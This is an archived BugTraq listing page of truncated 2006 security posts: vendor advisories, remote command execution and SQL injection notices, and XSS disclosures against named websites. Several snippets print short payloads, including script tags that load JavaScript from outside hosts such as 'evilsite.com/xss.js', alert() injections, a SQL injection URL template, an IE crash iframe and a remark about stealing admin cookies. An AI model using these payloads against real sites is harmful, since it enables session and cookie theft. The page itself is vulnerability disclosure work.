BugTraq Mode:
(Page 1122 of 1748)  < Prev  1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127  Next >
Re: BUGTRAQ:20060611 ThWboard 3.0 <= SQL Injection 2006-06-13
Steven M. Christey (coley mitre org)

>Exploit: http://www.example.com/showtopic.php?threadid=1&pagenum=[SQL]

The same program and parameter were already reported to Bugtraq by Qex
on April 19 for version 3 beta 2.84 (CVE-2006-1926).

- Steve

[ more ]  [ reply ]
DCP-Portal 6.1.x, Remote command execution 2006-06-12
Federico Fazzi (federico autistici org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------
Advisory id: FSA:013

Author: Federico Fazzi
Date: 12/06/2006, 9:31
Sinthesis: DCP-Portal 6.1.x, Remote command execution
Type: high
Product: http://www.dcp-portal.org/
Patch: unavail

[ more ]  [ reply ]
[FSA013] phpCMS 1.2.1pl2, Remote command execution 2006-06-12
Federico Fazzi (federico autistici org)
-----------------------------------------------------
Advisory id: FSA:014

Author: Federico Fazzi
Date: 12/06/2006, 10:25
Sinthesis: phpCMS 1.2.1pl2, Remote command execution
Type: high
Product: http://www.phpcms.de/
Patch: unavailable
-------------------------------------------------

[ more ]  [ reply ]
Content-Builder (CMS) 0.7.5, Remote command execution 2006-06-11
Federico Fazzi (federico autistici org)
-----------------------------------------------------
Advisory id: FSA:012

Author: Federico Fazzi
Date: 11/06/2006, 22:30
Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution
Type: high
Product: http://www.content-builder.de/
Patch: unavailable
----------------------------

[ more ]  [ reply ]
Emllabs.com - XSS 2006-06-09
luny youfucktard com
Emllabs.com

Effected files:

articles.php

search input box.

The search input box doesnt properally filter user input. for PoC try putting in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]

XSS Vulnerability:

http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://e

[ more ]  [ reply ]
internet explorer vulnerability based on MarjinZ & Mr.Niega discovered 2006-06-08
Kevin Berkane (kberkane asso-montevideo org)

Internet Explorer Crash [Proof of concept]

based on MarjinZ & Mr.Niega discovered

Affected Software: Internet explorer
Severity: Unknown
Impact: Crash

E-Mail: kberkane (at) asso-montevideo (dot) org [email concealed]

<HTLM><BODY><IFRAME src="File://Ò:/"></BODY></HTML>

[ more ]  [ reply ]
Invision Power Board XSS 2006-06-09
kepche msn com
*//Product :Invision Power Board

*//Version :2.1.6 and prior versions must be affected.

*//XSS=

http://localhost/forum/admin.php?phpinfo=<script>alert()</script>

*//You can steal only admins cookie.

*//www.spymastersnake.org

*//kepche (at) msn (dot) com [email concealed]

[ more ]  [ reply ]
Meefo.com - XSS with cookie include 2006-06-10
luny youfucktard com
Meefo.com

Homepage:

http://meefo.com

Effected files:

reading profiles

index.php

input boxes onprofiles

sending private msgs

------------------------------

Reading aprofile and with cookie include PoC:

Since data isn't properlly filtered (backslashes are added to ' and "), a user ca

[ more ]  [ reply ]
[ GLSA 200606-09 ] SpamAssassin: Execution of arbitrary code 2006-06-11
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
# MHG Security Team --- PHORUM 5.1.13 Remote File Inc. 2006-06-11
erne ernealizm com
# Milli-Harekat Advisory ( www.milli-harekat.org )

# PHORUM <= 5.1.13 - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : PHORUM 5.1.13

# Credits : ERNE

# Thanks : Dj_Remix,The_Bekir,Liz0zim,Eskobar,SpC-x,3n7r1k4 and ALL MHG USERS

# Vulnerable :

htt

[ more ]  [ reply ]
[EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow 2006-06-12
eEye Advisories (Advisories eeye com)
Symantec Remote Management Stack Buffer Overflow

Release Date:
June 12, 2006

Date Reported:
May 24, 2006

Severity:
High (Remote Code Execution)

Systems Affected:
Symantec AntiVirus 10.0.x for Windows (all versions)
Symantec AntiVirus 10.1.x for Windows (all versions)
Symantec Client Security 3.0

[ more ]  [ reply ]
Vampirefreaks.com - XSS with cookie disclosure 2006-06-11
luny youfucktard com
Vampirefreaks.com

Homepage:

http://www.vampirefreaks.com

Effected files:

input boxes of editing your profile

posting a journal entry.

Commenting

XSS Vulnerability:

Data isn't properly filtered when editing your profile. One way to bypass the filter is to escape quotes and useclosing

[ more ]  [ reply ]
Re: SSL VPNs and security 2006-06-09
thanekamp hotmail com
At least in terms of Cisco, you are confusing SSL VPN and Web VPN. They are not interoperable and offer different levels of security.

[ more ]  [ reply ]
myPHP Guestbook 2.0.2 XSS Vulnerabilitie 2006-06-09
x0r_1 hotmail de
a xss attack is possible in index.php

http://127.0.01/myphp/index.php?lang="<script>alert(1337)</script>

[ more ]  [ reply ]
RE: Internet Explorer vulnerbility 2006-06-09
Greg Merideth (Forward Technology) (gmerideth forwardtechnology net)
IE7 Beta 2 build [7.0.5346.5] parses without crashing.

Greg Merideth

Forward Technology, LLC.

CTO & Other Wild Stuff

gmerideth (at) forwardtechnology (dot) net [email concealed]

PGP Fingerprint

18C3CE191171736225D62C3829F7B18A00F2AC0C

-----Original Message-----

From: Mr.Niega (at) gmail (dot) com [email concealed] [mailto:Mr.Niega (at) gmail (dot) com [email concealed]]

[ more ]  [ reply ]
Re: SSL VPNs and security 2006-06-09
wnorth verizon net
Very good information, we use F5 firepass products and I could see the same issue inherinet in your statements. The benefits to the business, from a cost perspective, are many, no need for tokens unless you are doing 2-factor auth, which I encourage as it will check your personal PIN against your AD

[ more ]  [ reply ]
[ MDKSA-2006:099 ] - Updated freetype2 packages fixes multiple vulnerabilities. 2006-06-12
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:099
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]
rPSA-2006-0100-1 freetype 2006-06-12
Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0100-1
Published: 2006-06-12
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
User Non-deterministic Weakness
Updated Versions:
freetype=/conary.rpath.com@rpl:devel//1/2.1.10-2.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi

[ more ]  [ reply ]
[ GLSA 200606-14 ] GDM: Privilege escalation 2006-06-12
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
Yourfacesucks.com - XSS & cookie disclosure 2006-06-12
luny youfucktard com
Yourfacesucks.com

Homepage:

http://www.yourfacesucks.com

Effected files:

music/video input boxes in editing profile

subject box of sending a PM

thread.php

---------------------------------------

XSS Vuln with cookie disclosure in profile input boxes:

No filter evasion needed her

[ more ]  [ reply ]
Onlinenode.com - XSS 2006-06-11
luny youfucktard com
Onlinenode.com

Homepage:

http://www.onlinenode.com

Effected files:

node_category.php

node_article.php

webpage.php

guestbook.php

journal.php

pictures.php

chatroom.php

---------------------------

XSS Vuln via node_category.php:

One way to archive this is to use black tags with a

[ more ]  [ reply ]
Blackplanet.com - XSS & cookie disclosure vuln. 2006-06-11
luny youfucktard com
Blackplanet.com

Homepage:

http://www.blackplanet.com

Effected files:

input boxes of editing your profile.

Bypassing blackplanet.com's filters wasn't very hard, they even give alistof acceptable html tags. Some of which

included: div, base, bgsound, body, br, embed, img and others.

[ more ]  [ reply ]
Stargazer.org - XSS with Session output 2006-06-11
luny youfucktard com
Stargazer.org

Homepage:

http://www.stargazer.org

Effected files:

login box

registration boxes

creating a survey

---------------------------------------

Login box & registration XSS Vuln:

for proof of concept just try adding:

'';!--"<XSS>=&{()}<SCRIPT SRC=http://youfucktard.com/xs

[ more ]  [ reply ]
ThWboard 3.0 <= SQL Injection 2006-06-11
666 hell de tk
// ThWboard 3.0 <= SQL Injection //

-----------------------------------------------------------------

[~] Advisory by: SR-Crew

[-] Exploit: http://www.example.com/showtopic.php?threadid=1&pagenum=[SQL]

[-] Googledork: -

[+] Greetz to: BlueGeek.de

[+] Visit: www.SR-Crew.de.tt

[ more ]  [ reply ]
(Page 1122 of 1748)  < Prev  1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus